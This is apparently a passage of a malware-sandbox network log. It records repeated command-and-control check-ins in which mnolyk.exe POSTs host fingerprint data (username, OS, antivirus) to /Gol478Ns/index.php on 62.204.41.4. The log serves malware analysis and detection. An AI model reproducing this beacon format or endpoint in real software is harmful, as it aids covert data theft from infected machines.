                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.497771978 CET666INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            478192.168.2.45017362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:38.673124075 CET666OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.736965895 CET667INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            479192.168.2.45017462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:38.936331034 CET667OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.999413967 CET668INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            48192.168.2.44974362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:38.542907953 CET237OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.607089996 CET237INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            480192.168.2.45017562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:39.452531099 CET668OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:39.517776012 CET669INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            481192.168.2.45017662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:39.790671110 CET669OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:39.855304956 CET670INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            482192.168.2.45017762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:40.085026979 CET670OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:40.152656078 CET671INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            483192.168.2.45017862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:40.855897903 CET671OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:40.917797089 CET672INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            484192.168.2.45017962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:41.189675093 CET672OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:41.253341913 CET673INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            485192.168.2.45018062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:42.064683914 CET673OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:42.130455017 CET674INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            486192.168.2.45018162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:42.912009001 CET674OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:42.977669001 CET675INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            487192.168.2.45018262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:43.165436029 CET675OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.227242947 CET676INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            488192.168.2.45018362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:43.402506113 CET676OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.466197968 CET677INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            489192.168.2.45018462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:43.643716097 CET677OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.706780910 CET678INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            49192.168.2.44974462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:38.778107882 CET238OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.845237017 CET238INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            490192.168.2.45018562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:43.888645887 CET678OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:43.951951981 CET679INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            491192.168.2.45018662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:44.122139931 CET679OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.186357975 CET680INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            492192.168.2.45018762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:44.356708050 CET680OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.420044899 CET681INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            493192.168.2.45018862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:44.592464924 CET681OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.657511950 CET682INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            494192.168.2.45018962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:44.828385115 CET682OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:44.893361092 CET683INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            495192.168.2.45019062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:45.059725046 CET683OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:45.125121117 CET684INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            496192.168.2.45019162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:45.295485973 CET684OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
